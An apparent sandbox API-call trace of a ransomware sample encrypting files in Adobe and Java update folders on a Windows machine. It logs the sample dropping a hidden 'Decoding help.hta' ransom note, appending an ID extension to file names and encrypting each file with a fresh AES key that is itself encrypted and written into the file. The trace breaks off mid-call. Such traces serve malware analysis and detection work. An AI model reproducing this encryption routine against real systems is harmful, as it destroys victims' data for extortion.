1 [0042.476] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.476] WriteFile (in: hFile=0x640, lpBuffer=0xb40fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xb40fcf8, lpOverlapped=0x0 | out: lpBuffer=0xb40fbe4*, lpNumberOfBytesWritten=0xb40fcf8*=0x100, lpOverlapped=0x0) returned 1 [0042.477] WriteFile (in: hFile=0x640, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xb40fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xb40fcf8*=0x500, lpOverlapped=0x0) returned 1 [0042.477] CloseHandle (hObject=0x640) returned 1 [0042.481] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0042.484] FindNextFileW (in: hFindFile=0x671030, lpFindFileData=0xb40fd30 | out: lpFindFileData=0xb40fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0xb4450880, ftLastWriteTime.dwHighDateTime=0x1cf6c45, nFileSizeHigh=0x0, nFileSizeLow=0x10e3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10110_MUI.msp", cAlternateFileName="ADBERD~1.MSP")) returned 1 [0042.484] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0042.484] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned 46 [0042.484] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" [0042.484] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\decoding help.hta")) returned 0x1 [0042.484] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AdbeRdrUpd10110_MUI.msp") returned 1 [0042.484] lstrlenW (lpString="AdbeRdrUpd10110_MUI.msp") returned 23 [0042.484] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0042.484] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned 46 [0042.484] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="AdbeRdrUpd10110_MUI.msp" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" [0042.484] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" [0042.484] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]" [0042.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.485] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x640 [0042.485] CreateFileMappingA (hFile=0x640, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x644 [0042.485] CryptAcquireContextA (in: phProv=0xb40fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb40fcec*=0x3448698) returned 1 [0042.486] CryptGenKey (in: hProv=0x3448698, Algid=0x6610, dwFlags=0x1, phKey=0xb40fce8 | out: phKey=0xb40fce8*=0x6712b0) returned 1 [0042.486] CryptExportKey (in: hKey=0x6712b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb40fbe4, pdwDataLen=0xb40fce4 | out: pbData=0xb40fbe4*, pdwDataLen=0xb40fce4*=0x2c) returned 1 [0042.486] MapViewOfFile (hFileMappingObject=0x644, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x21810000 [0044.046] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb40fbe4*, pdwDataLen=0xb40fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb40fbe4*, pdwDataLen=0xb40fcf8*=0x100) returned 1 [0046.310] CryptEncrypt (in: hKey=0x6712b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21810000, pdwDataLen=0xb40fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x21810000*, pdwDataLen=0xb40fce4*=0x100000) returned 1 [0047.341] UnmapViewOfFile (lpBaseAddress=0x21810000) returned 1 [0047.361] CloseHandle (hObject=0x644) returned 1 [0047.361] CryptDestroyKey (hKey=0x6712b0) returned 1 [0047.361] CryptReleaseContext (hProv=0x3448698, dwFlags=0x0) returned 1 [0047.361] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.361] WriteFile (in: hFile=0x640, lpBuffer=0xb40fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xb40fcf8, lpOverlapped=0x0 | out: lpBuffer=0xb40fbe4*, lpNumberOfBytesWritten=0xb40fcf8*=0x100, lpOverlapped=0x0) returned 1 [0047.750] WriteFile (in: hFile=0x640, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xb40fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xb40fcf8*=0x500, lpOverlapped=0x0) returned 1 [0047.751] CloseHandle (hObject=0x640) returned 1 [0057.524] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0057.524] FindNextFileW (in: hFindFile=0x671030, lpFindFileData=0xb40fd30 | out: lpFindFileData=0xb40fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 1 [0057.524] lstrcpyW (in: lpString1=0x2a8a87f0, lpString2="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0057.524] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned 46 [0057.524] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" [0057.524] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\decoding help.hta")) returned 0x1 [0057.524] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AdbeRdrUpd10116_MUI.msp") returned 1 [0057.524] lstrlenW (lpString="AdbeRdrUpd10116_MUI.msp") returned 23 [0057.524] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0057.524] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned 46 [0057.524] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="AdbeRdrUpd10116_MUI.msp" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" [0057.525] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" [0057.525] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]" [0057.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.525] FindNextFileW (in: hFindFile=0x671030, lpFindFileData=0xb40fd30 | out: lpFindFileData=0xb40fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 0 [0057.525] FindClose (in: hFindFile=0x671030 | out: hFindFile=0x671030) returned 1 Thread: id = 298 os_tid = 0x30c [0042.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*", lpFindFileData=0xb54fd30 | out: lpFindFileData=0xb54fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801d42c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80220580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80220580, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670ff0 [0042.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.420] FindNextFileW (in: hFindFile=0x670ff0, lpFindFileData=0xb54fd30 | out: lpFindFileData=0xb54fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801d42c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80220580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80220580, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.420] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.420] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.420] FindNextFileW (in: hFindFile=0x670ff0, lpFindFileData=0xb54fd30 | out: lpFindFileData=0xb54fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa1fc00, ftCreationTime.dwHighDateTime=0x1ce76b1, ftLastAccessTime.dwLowDateTime=0x801fa420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xaa1fc00, ftLastWriteTime.dwHighDateTime=0x1ce76b1, nFileSizeHigh=0x0, nFileSizeLow=0x3cb80, dwReserved0=0x0, dwReserved1=0x0, cFileName="jaucheck.exe", cAlternateFileName="")) returned 1 [0042.420] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" [0042.420] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned 60 [0042.420] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta" [0042.420] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\decoding help.hta")) returned 0xffffffff [0042.420] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634 [0042.433] WriteFile (in: hFile=0x634, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xb54fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xb54fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.434] CloseHandle (hObject=0x634) returned 1 [0042.434] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.435] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jaucheck.exe") returned -1 [0042.435] lstrlenW (lpString="jaucheck.exe") returned 12 [0042.435] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" [0042.435] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned 60 [0042.435] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\", lpString2="jaucheck.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe" [0042.435] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe" [0042.435] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0042.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaucheck.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaucheck.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.436] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaucheck.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634 [0042.436] CreateFileMappingA (hFile=0x634, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x638 [0042.436] CryptAcquireContextA (in: phProv=0xb54fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb54fcec*=0x3448720) returned 1 [0042.437] CryptGenKey (in: hProv=0x3448720, Algid=0x6610, dwFlags=0x1, phKey=0xb54fce8 | out: phKey=0xb54fce8*=0x671170) returned 1 [0042.437] CryptExportKey (in: hKey=0x671170, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb54fbe4, pdwDataLen=0xb54fce4 | out: pbData=0xb54fbe4*, pdwDataLen=0xb54fce4*=0x2c) returned 1 [0042.437] MapViewOfFile (hFileMappingObject=0x638, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3cb80) returned 0x217d0000 [0044.047] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb54fbe4*, pdwDataLen=0xb54fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb54fbe4*, pdwDataLen=0xb54fcf8*=0x100) returned 1 [0046.435] CryptEncrypt (in: hKey=0x671170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x217d0000, pdwDataLen=0xb54fce4*=0x3cb80, dwBufLen=0x3cb80 | out: pbData=0x217d0000*, pdwDataLen=0xb54fce4*=0x3cb80) returned 1 [0046.718] UnmapViewOfFile (lpBaseAddress=0x217d0000) returned 1 [0046.722] CloseHandle (hObject=0x638) returned 1 [0046.722] CryptDestroyKey (hKey=0x671170) returned 1 [0046.722] CryptReleaseContext (hProv=0x3448720, dwFlags=0x0) returned 1 [0046.722] SetFilePointerEx (in: hFile=0x634, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.722] WriteFile (in: hFile=0x634, lpBuffer=0xb54fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xb54fcf8, lpOverlapped=0x0 | out: lpBuffer=0xb54fbe4*, lpNumberOfBytesWritten=0xb54fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.723] WriteFile (in: hFile=0x634, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xb54fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xb54fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.723] CloseHandle (hObject=0x634) returned 1 [0046.726] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.727] FindNextFileW (in: hFindFile=0x670ff0, lpFindFileData=0xb54fd30 | out: lpFindFileData=0xb54fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fa200, ftCreationTime.dwHighDateTime=0x1ce76b1, ftLastAccessTime.dwLowDateTime=0x801fa420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x83fa200, ftLastWriteTime.dwHighDateTime=0x1ce76b1, nFileSizeHigh=0x0, nFileSizeLow=0x39780, dwReserved0=0x0, dwReserved1=0x0, cFileName="jaureg.exe", cAlternateFileName="")) returned 1 [0046.727] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" [0046.727] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned 60 [0046.727] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta" [0046.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\decoding help.hta")) returned 0x1 [0046.727] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jaureg.exe") returned -1 [0046.727] lstrlenW (lpString="jaureg.exe") returned 10 [0046.727] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" [0046.727] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned 60 [0046.727] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\", lpString2="jaureg.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe" [0046.727] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe" [0046.727] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0046.727] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaureg.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaureg.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.728] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaureg.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634 [0046.728] CreateFileMappingA (hFile=0x634, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x638 [0046.728] CryptAcquireContextA (in: phProv=0xb54fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb54fcec*=0x3448720) returned 1 [0046.729] CryptGenKey (in: hProv=0x3448720, Algid=0x6610, dwFlags=0x1, phKey=0xb54fce8 | out: phKey=0xb54fce8*=0x6711b0) returned 1 [0046.729] CryptExportKey (in: hKey=0x6711b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb54fbe4, pdwDataLen=0xb54fce4 | out: pbData=0xb54fbe4*, pdwDataLen=0xb54fce4*=0x2c) returned 1 [0046.730] MapViewOfFile (hFileMappingObject=0x638, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x39780) returned 0x8650000 [0048.155] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb54fbe4*, pdwDataLen=0xb54fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb54fbe4*, pdwDataLen=0xb54fcf8*=0x100) returned 1 [0049.195] CryptEncrypt (in: hKey=0x6711b0, hHash=0x0, Final=0, dwFlags=0x0, 